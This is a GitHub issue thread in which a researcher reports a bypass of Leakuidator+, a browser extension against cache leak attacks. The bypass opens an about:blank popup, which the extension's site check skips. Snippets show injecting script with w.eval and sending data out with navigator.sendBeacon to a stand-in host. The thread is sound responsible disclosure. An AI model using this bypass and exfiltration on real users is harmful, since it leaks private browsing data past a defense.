### ISSUE TITLE
about:blank skips corwc check

### ISSUE THREAD

**Issue by NDevTK** [mjz3/LeakuidatorPlus#11]
Create popunder `let w = open('');`
Navigate its opener `opener.location = target;`

**Comment by mjz3** [comment]
How does it bypass the protections provided against popunder and tabuder variants?

**Comment by NDevTK** [comment]
No tab relations meaning no protection is provided.

**Comment by mjz3** [comment]
Can you clarify this one? How does this example escape from being recorded as a tab/window relation? The extension records tab/window relations and applies the defense bidirectionally.

**Comment by NDevTK** [comment]
Because I did open('') its on about:blank

In onBeforeSendHeaders:
sourceSite = utils.getSiteFromUrl('about:blank'); returns ""
So would not work for this check !utils.isEmpty(sourceSite)

**Comment by mjz3** [comment]
onBeforeSendHeaders should trigger again for ```opener.location = target;```
Doesn't it?

**Comment by NDevTK** [comment]
It does this is an issue with getSiteFromUrl returning nothing on about:blank

**Comment by mjz3** [comment]
The attack requires two webpages running at the same time; 1) an attack page observing the cache contention and 2) a victim page, loading sensitive data. A blank page cannot contain either of these two pages

**Comment by NDevTK** [comment]
about:blank is not just a blank page as it inherits its origin you can inject what ever you want on it.

**Comment by mjz3** [comment]
Ok, lets consider this as the pseudo code for what you suggest:

Create popunder:
```
let w = open('');
```
And then, inject code into popunder:
```
w.Inject("
  opener.location = 'leaky.resource';

  some code to record the cache trace;

  some code to send the cache trace to an attacker server;
");
```

What I miss here is the Inject primitive. Can you give me a working example for Inject?
You can modify the attack page at [1]. 

Also, you can try other ways to bypass Leakuidator+ by modifying [1,2,3] and verify it by trying it when the extension is enabled. Keep in mind to host the attack page on a valid domain when testing on the extension.

[1] https://github.com/leakuidatorplusteam/artifacts/blob/main/wp_popunder.html
[2] https://github.com/leakuidatorplusteam/artifacts/blob/main/wp_tabunder.html
[3] https://github.com/leakuidatorplusteam/artifacts/blob/main/wp_iframe.html

**Comment by NDevTK** [comment]
w.eval("alert('injected js')")

**Comment by mjz3** [comment]
Following what you suggested, using eval I was able to change the opener.location and then call alert, but not able to make requests. Is it possible to make HTTP requests inside eval? Assuming that the cache measurement can be implemented using eval, an HTTP request is necessary as next step in order to send the final cache trace to the attacker server.

**Comment by NDevTK** [comment]
Yes its just normal JS w.eval("navigator.sendBeacon('https://example.com', 'foobar')");

**Comment by mjz3** [comment]
I am convinced this is a valid bypass, though not stealthy.
